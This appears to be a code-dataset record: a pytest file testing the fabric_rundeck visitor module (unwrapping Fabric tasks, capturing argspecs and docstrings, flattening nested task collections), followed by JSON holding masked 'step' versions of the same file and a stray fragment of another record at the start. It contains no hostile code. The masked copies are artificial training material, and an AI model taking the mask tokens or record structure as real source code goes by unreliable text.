\")\n\n\tprint(\"\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#
# Author:: Noah Kantrowitz <[email protected]>
#
# Copyright 2014, Noah Kantrowitz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from fabric.api import task, roles
import pytest
from fabric_rundeck import visitor
def fixture_path(*path):
return os.path.join(os.path.dirname(__file__), 'data', *path)
class TestUnwrap(object):
@pytest.fixture
def fn(self):
def fn():
pass
return fn
def test_fn(self, fn):
assert visitor.unwrap(fn) is fn
def test_task(self, fn):
t = task(fn)
assert visitor.unwrap(t) is fn
def test_taskcall(self, fn):
t = task()(fn)
assert visitor.unwrap(t) is fn
def test_task_roles(self, fn):
t = task(roles('foo')(fn))
assert visitor.unwrap(t) is fn
def test_taskcall_roles(self, fn):
t = task()(roles('foo')(fn))
assert visitor.unwrap(t) is fn
def test_roles_task(self, fn):
t = roles('foo')(task(fn))
assert visitor.unwrap(t) is fn
def test_roles_taskcall(self, fn):
t = roles('foo')(task()(fn))
assert visitor.unwrap(t) is fn
def test_lambda(self):
fn = lambda: None
assert visitor.unwrap(fn) is fn
def test_lambda_task(self):
fn = lambda: None
t = task(fn)
assert visitor.unwrap(t) is fn
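# visit_task should capture the task's name, module path, docstring, cron setting, and argspec.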
class TestVisitTask(object):
def test_no_args(self):
def fn():
pass
assert visitor.visit_task(fn, ()) == {
'name': 'fn',
'path': (),
'doc': None,
'cron': None,
'argspec': {
'args': [],
'varargs': None,
'keywords': None,
'defaults': None,
},
}
def test_simple_args(self):
def fn(a, b):
pass
assert visitor.visit_task(fn, ()) == {
'name': 'fn',
'path': (),
'doc': None,
'cron': None,
'argspec': {
'args': ['a', 'b'],
'varargs': None,
'keywords': None,
'defaults': None,
},
}
def test_arg_defaults(self):
def fn(a, b=1, c=None):
pass
assert visitor.visit_task(fn, ()) == {
'name': 'fn',
'path': (),
'doc': None,
'cron': None,
'argspec': {
'args': ['a', 'b', 'c'],
'varargs': None,
'keywords': None,
'defaults': (1, None),
},
}
def test_varargs(self):
def fn(*args, **kwargs):
pass
assert visitor.visit_task(fn, ()) == {
'name': 'fn',
'path': (),
'doc': None,
'cron': None,
'argspec': {
'args': [],
'varargs': 'args',
'keywords': 'kwargs',
'defaults': None,
},
}
def test_docs(self):
def fn(*args, **kwargs):
"""I am a teapot."""
pass
assert visitor.visit_task(fn, ()) == {
'name': 'fn',
'path': (),
'doc': 'I am a teapot.',
'cron': None,
'argspec': {
'args': [],
'varargs': 'args',
'keywords': 'kwargs',
'defaults': None,
},
}
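# visit should flatten nested task collections into a flat list, recording module nesting in 'path'.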
class TestVisit(object):
def test_single(self):
def fn():
pass
callables = {
'fn': fn,
}
data = visitor.visit(callables)
assert len(data) == 1
assert data[0]['name'] == 'fn'
def test_multi(self):
def fn():
pass
def fn2():
pass
def fn3():
pass
callables = {
'fn': fn,
'fn2': fn2,
'fn3': fn3,
}
data = visitor.visit(callables)
assert len(data) == 3
assert data[0]['name'] == 'fn'
assert data[1]['name'] == 'fn2'
assert data[2]['name'] == 'fn3'
def test_nested(self):
def fn():
pass
def fn2():
pass
def fn3():
pass
callables = {
'fn': fn,
'mod': {
'fn2': fn2,
'fn3': fn3,
}
}
data = visitor.visit(callables)
assert len(data) == 3
assert data[0]['name'] == 'fn'
assert data[0]['path'] == ()
assert data[1]['name'] == 'fn2'
assert data[1]['path'] == ('mod',)
assert data[2]['name'] == 'fn3'
assert data[2]['path'] == ('mod',)
class TestVisitFabfile(object):
def test_one(self):
data = visitor.visit_fabfile(fixture_path('fabfile_one.py'))
assert len(data) == 3
|
normal
|
{
"blob_id": "a1e563f94044ff7cd7e0e55542bc4ca2db81df28",
"index": 9749,
"step-1": "<mask token>\n\n\nclass TestUnwrap(object):\n\n @pytest.fixture\n def fn(self):\n\n def fn():\n pass\n return fn\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass TestVisitTask(object):\n\n def test_no_args(self):\n\n def fn():\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n None, 'keywords': None, 'defaults': None}}\n\n def test_simple_args(self):\n\n def fn(a, b):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b'],\n 'varargs': None, 'keywords': None, 'defaults': None}}\n\n def test_arg_defaults(self):\n\n def fn(a, b=1, c=None):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b', 'c'],\n 'varargs': None, 'keywords': None, 'defaults': (1, None)}}\n\n def test_varargs(self):\n\n def fn(*args, **kwargs):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n def test_docs(self):\n\n def fn(*args, **kwargs):\n \"\"\"I am a teapot.\"\"\"\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': 'I am a teapot.', 'cron': None, 'argspec': {'args': [],\n 'varargs': 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n\nclass TestVisit(object):\n\n def test_single(self):\n\n def fn():\n pass\n callables = {'fn': fn}\n data = visitor.visit(callables)\n assert len(data) == 1\n assert data[0]['name'] == 'fn'\n\n def test_multi(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'fn2': fn2, 'fn3': fn3}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[1]['name'] == 'fn2'\n assert data[2]['name'] == 'fn3'\n\n def test_nested(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'mod': {'fn2': fn2, 'fn3': fn3}}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[0]['path'] == ()\n assert data[1]['name'] == 'fn2'\n assert data[1]['path'] == ('mod',)\n assert data[2]['name'] == 'fn3'\n assert data[2]['path'] == ('mod',)\n\n\nclass TestVisitFabfile(object):\n\n def test_one(self):\n data = visitor.visit_fabfile(fixture_path('fabfile_one.py'))\n assert len(data) == 3\n",
"step-2": "<mask token>\n\n\nclass TestUnwrap(object):\n\n @pytest.fixture\n def fn(self):\n\n def fn():\n pass\n return fn\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_roles_task(self, fn):\n t = roles('foo')(task(fn))\n assert visitor.unwrap(t) is fn\n <mask token>\n <mask token>\n <mask token>\n\n\nclass TestVisitTask(object):\n\n def test_no_args(self):\n\n def fn():\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n None, 'keywords': None, 'defaults': None}}\n\n def test_simple_args(self):\n\n def fn(a, b):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b'],\n 'varargs': None, 'keywords': None, 'defaults': None}}\n\n def test_arg_defaults(self):\n\n def fn(a, b=1, c=None):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b', 'c'],\n 'varargs': None, 'keywords': None, 'defaults': (1, None)}}\n\n def test_varargs(self):\n\n def fn(*args, **kwargs):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n def test_docs(self):\n\n def fn(*args, **kwargs):\n \"\"\"I am a teapot.\"\"\"\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': 'I am a teapot.', 'cron': None, 'argspec': {'args': [],\n 'varargs': 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n\nclass TestVisit(object):\n\n def test_single(self):\n\n def fn():\n pass\n callables = {'fn': fn}\n data = visitor.visit(callables)\n assert len(data) == 1\n assert data[0]['name'] == 'fn'\n\n def test_multi(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'fn2': fn2, 'fn3': fn3}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[1]['name'] == 'fn2'\n assert data[2]['name'] == 'fn3'\n\n def test_nested(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'mod': {'fn2': fn2, 'fn3': fn3}}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[0]['path'] == ()\n assert data[1]['name'] == 'fn2'\n assert data[1]['path'] == ('mod',)\n assert data[2]['name'] == 'fn3'\n assert data[2]['path'] == ('mod',)\n\n\nclass TestVisitFabfile(object):\n\n def test_one(self):\n data = visitor.visit_fabfile(fixture_path('fabfile_one.py'))\n assert len(data) == 3\n",
"step-3": "<mask token>\n\n\nclass TestUnwrap(object):\n\n @pytest.fixture\n def fn(self):\n\n def fn():\n pass\n return fn\n\n def test_fn(self, fn):\n assert visitor.unwrap(fn) is fn\n\n def test_task(self, fn):\n t = task(fn)\n assert visitor.unwrap(t) is fn\n <mask token>\n\n def test_task_roles(self, fn):\n t = task(roles('foo')(fn))\n assert visitor.unwrap(t) is fn\n\n def test_taskcall_roles(self, fn):\n t = task()(roles('foo')(fn))\n assert visitor.unwrap(t) is fn\n\n def test_roles_task(self, fn):\n t = roles('foo')(task(fn))\n assert visitor.unwrap(t) is fn\n <mask token>\n <mask token>\n\n def test_lambda_task(self):\n fn = lambda : None\n t = task(fn)\n assert visitor.unwrap(t) is fn\n\n\nclass TestVisitTask(object):\n\n def test_no_args(self):\n\n def fn():\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n None, 'keywords': None, 'defaults': None}}\n\n def test_simple_args(self):\n\n def fn(a, b):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b'],\n 'varargs': None, 'keywords': None, 'defaults': None}}\n\n def test_arg_defaults(self):\n\n def fn(a, b=1, c=None):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b', 'c'],\n 'varargs': None, 'keywords': None, 'defaults': (1, None)}}\n\n def test_varargs(self):\n\n def fn(*args, **kwargs):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n def test_docs(self):\n\n def fn(*args, **kwargs):\n \"\"\"I am a teapot.\"\"\"\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': 'I am a teapot.', 'cron': None, 'argspec': {'args': [],\n 'varargs': 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n\nclass TestVisit(object):\n\n def test_single(self):\n\n def fn():\n pass\n callables = {'fn': fn}\n data = visitor.visit(callables)\n assert len(data) == 1\n assert data[0]['name'] == 'fn'\n\n def test_multi(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'fn2': fn2, 'fn3': fn3}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[1]['name'] == 'fn2'\n assert data[2]['name'] == 'fn3'\n\n def test_nested(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'mod': {'fn2': fn2, 'fn3': fn3}}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[0]['path'] == ()\n assert data[1]['name'] == 'fn2'\n assert data[1]['path'] == ('mod',)\n assert data[2]['name'] == 'fn3'\n assert data[2]['path'] == ('mod',)\n\n\nclass TestVisitFabfile(object):\n\n def test_one(self):\n data = visitor.visit_fabfile(fixture_path('fabfile_one.py'))\n assert len(data) == 3\n",
"step-4": "import os\nfrom fabric.api import task, roles\nimport pytest\nfrom fabric_rundeck import visitor\n\n\ndef fixture_path(*path):\n return os.path.join(os.path.dirname(__file__), 'data', *path)\n\n\nclass TestUnwrap(object):\n\n @pytest.fixture\n def fn(self):\n\n def fn():\n pass\n return fn\n\n def test_fn(self, fn):\n assert visitor.unwrap(fn) is fn\n\n def test_task(self, fn):\n t = task(fn)\n assert visitor.unwrap(t) is fn\n\n def test_taskcall(self, fn):\n t = task()(fn)\n assert visitor.unwrap(t) is fn\n\n def test_task_roles(self, fn):\n t = task(roles('foo')(fn))\n assert visitor.unwrap(t) is fn\n\n def test_taskcall_roles(self, fn):\n t = task()(roles('foo')(fn))\n assert visitor.unwrap(t) is fn\n\n def test_roles_task(self, fn):\n t = roles('foo')(task(fn))\n assert visitor.unwrap(t) is fn\n\n def test_roles_taskcall(self, fn):\n t = roles('foo')(task()(fn))\n assert visitor.unwrap(t) is fn\n\n def test_lambda(self):\n fn = lambda : None\n assert visitor.unwrap(fn) is fn\n\n def test_lambda_task(self):\n fn = lambda : None\n t = task(fn)\n assert visitor.unwrap(t) is fn\n\n\nclass TestVisitTask(object):\n\n def test_no_args(self):\n\n def fn():\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n None, 'keywords': None, 'defaults': None}}\n\n def test_simple_args(self):\n\n def fn(a, b):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b'],\n 'varargs': None, 'keywords': None, 'defaults': None}}\n\n def test_arg_defaults(self):\n\n def fn(a, b=1, c=None):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': ['a', 'b', 'c'],\n 'varargs': None, 'keywords': None, 'defaults': (1, None)}}\n\n def test_varargs(self):\n\n def fn(*args, **kwargs):\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': None, 'cron': None, 'argspec': {'args': [], 'varargs':\n 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n def test_docs(self):\n\n def fn(*args, **kwargs):\n \"\"\"I am a teapot.\"\"\"\n pass\n assert visitor.visit_task(fn, ()) == {'name': 'fn', 'path': (),\n 'doc': 'I am a teapot.', 'cron': None, 'argspec': {'args': [],\n 'varargs': 'args', 'keywords': 'kwargs', 'defaults': None}}\n\n\nclass TestVisit(object):\n\n def test_single(self):\n\n def fn():\n pass\n callables = {'fn': fn}\n data = visitor.visit(callables)\n assert len(data) == 1\n assert data[0]['name'] == 'fn'\n\n def test_multi(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'fn2': fn2, 'fn3': fn3}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[1]['name'] == 'fn2'\n assert data[2]['name'] == 'fn3'\n\n def test_nested(self):\n\n def fn():\n pass\n\n def fn2():\n pass\n\n def fn3():\n pass\n callables = {'fn': fn, 'mod': {'fn2': fn2, 'fn3': fn3}}\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[0]['path'] == ()\n assert data[1]['name'] == 'fn2'\n assert data[1]['path'] == ('mod',)\n assert data[2]['name'] == 'fn3'\n assert data[2]['path'] == ('mod',)\n\n\nclass TestVisitFabfile(object):\n\n def test_one(self):\n data = visitor.visit_fabfile(fixture_path('fabfile_one.py'))\n assert len(data) == 3\n",
"step-5": "#\n# Author:: Noah Kantrowitz <[email protected]>\n#\n# Copyright 2014, Noah Kantrowitz\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport os\n\nfrom fabric.api import task, roles\nimport pytest\n\nfrom fabric_rundeck import visitor\n\n\ndef fixture_path(*path):\n return os.path.join(os.path.dirname(__file__), 'data', *path)\n\n\nclass TestUnwrap(object):\n @pytest.fixture\n def fn(self):\n def fn():\n pass\n return fn\n\n def test_fn(self, fn):\n assert visitor.unwrap(fn) is fn\n\n def test_task(self, fn):\n t = task(fn)\n assert visitor.unwrap(t) is fn\n\n def test_taskcall(self, fn):\n t = task()(fn)\n assert visitor.unwrap(t) is fn\n\n def test_task_roles(self, fn):\n t = task(roles('foo')(fn))\n assert visitor.unwrap(t) is fn\n\n def test_taskcall_roles(self, fn):\n t = task()(roles('foo')(fn))\n assert visitor.unwrap(t) is fn\n\n def test_roles_task(self, fn):\n t = roles('foo')(task(fn))\n assert visitor.unwrap(t) is fn\n\n def test_roles_taskcall(self, fn):\n t = roles('foo')(task()(fn))\n assert visitor.unwrap(t) is fn\n\n def test_lambda(self):\n fn = lambda: None\n assert visitor.unwrap(fn) is fn\n\n def test_lambda_task(self):\n fn = lambda: None\n t = task(fn)\n assert visitor.unwrap(t) is fn\n\n\nclass TestVisitTask(object):\n def test_no_args(self):\n def fn():\n pass\n assert visitor.visit_task(fn, ()) == {\n 'name': 'fn',\n 'path': (),\n 'doc': None,\n 'cron': None,\n 'argspec': {\n 'args': [],\n 'varargs': None,\n 'keywords': None,\n 'defaults': None,\n },\n }\n\n def test_simple_args(self):\n def fn(a, b):\n pass\n assert visitor.visit_task(fn, ()) == {\n 'name': 'fn',\n 'path': (),\n 'doc': None,\n 'cron': None,\n 'argspec': {\n 'args': ['a', 'b'],\n 'varargs': None,\n 'keywords': None,\n 'defaults': None,\n },\n }\n\n def test_arg_defaults(self):\n def fn(a, b=1, c=None):\n pass\n assert visitor.visit_task(fn, ()) == {\n 'name': 'fn',\n 'path': (),\n 'doc': None,\n 'cron': None,\n 'argspec': {\n 'args': ['a', 'b', 'c'],\n 'varargs': None,\n 'keywords': None,\n 'defaults': (1, None),\n },\n }\n\n def test_varargs(self):\n def fn(*args, **kwargs):\n pass\n assert visitor.visit_task(fn, ()) == {\n 'name': 'fn',\n 'path': (),\n 'doc': None,\n 'cron': None,\n 'argspec': {\n 'args': [],\n 'varargs': 'args',\n 'keywords': 'kwargs',\n 'defaults': None,\n },\n }\n\n def test_docs(self):\n def fn(*args, **kwargs):\n \"\"\"I am a teapot.\"\"\"\n pass\n assert visitor.visit_task(fn, ()) == {\n 'name': 'fn',\n 'path': (),\n 'doc': 'I am a teapot.',\n 'cron': None,\n 'argspec': {\n 'args': [],\n 'varargs': 'args',\n 'keywords': 'kwargs',\n 'defaults': None,\n },\n }\n\n\nclass TestVisit(object):\n def test_single(self):\n def fn():\n pass\n callables = {\n 'fn': fn,\n }\n data = visitor.visit(callables)\n assert len(data) == 1\n assert data[0]['name'] == 'fn'\n\n def test_multi(self):\n def fn():\n pass\n def fn2():\n pass\n def fn3():\n pass\n callables = {\n 'fn': fn,\n 'fn2': fn2,\n 'fn3': fn3,\n }\n data = visitor.visit(callables)\n assert len(data) == 3\n 
assert data[0]['name'] == 'fn'\n assert data[1]['name'] == 'fn2'\n assert data[2]['name'] == 'fn3'\n\n def test_nested(self):\n def fn():\n pass\n def fn2():\n pass\n def fn3():\n pass\n callables = {\n 'fn': fn,\n 'mod': {\n 'fn2': fn2,\n 'fn3': fn3,\n }\n }\n data = visitor.visit(callables)\n assert len(data) == 3\n assert data[0]['name'] == 'fn'\n assert data[0]['path'] == ()\n assert data[1]['name'] == 'fn2'\n assert data[1]['path'] == ('mod',)\n assert data[2]['name'] == 'fn3'\n assert data[2]['path'] == ('mod',)\n\n\nclass TestVisitFabfile(object):\n def test_one(self):\n data = visitor.visit_fabfile(fixture_path('fabfile_one.py'))\n assert len(data) == 3\n",
"step-ids": [
14,
15,
20,
25,
26
]
}
|
[
14,
15,
20,
25,
26
] |